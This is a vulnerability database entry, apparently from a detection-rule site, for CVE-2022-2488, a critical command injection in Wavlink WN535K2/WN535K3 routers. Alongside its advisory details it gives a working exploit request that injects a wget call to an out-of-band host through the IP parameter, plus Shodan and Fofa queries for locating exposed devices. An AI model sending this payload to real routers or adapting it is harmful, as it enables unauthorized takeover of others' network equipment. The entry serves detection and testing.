🔙 목록으로 돌아가기

CVE-2022-2488: Wavlink WN535K2/WN535K3 - OS Command Injection

TitleWavlink WN535K2/WN535K3 - OS Command Injection
AuthorFor3stCo1d
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
RemediationApply the latest firmware update provided by the vendor to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.93197
CVE IDCVE-2022-2488
CWE IDCWE-78
Shodan Queryhttp.title:"Wi-Fi APP Login"http.title:"wi-fi app login"
Fofa Querytitle="wi-fi app login"
Tags cve cve2022 iot wavlink router rce oast vkev vuln

🔍 Vulnerability Description

Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in /cgi-bin/touchlist_sync.cgi via manipulation of the argument IP. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

🌐 HTTP Request

GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://d5jm7qhle0o3qj5aiv50socgd1hgrzyh1.oast.fun; HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; es-es) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-2488.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-2488.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A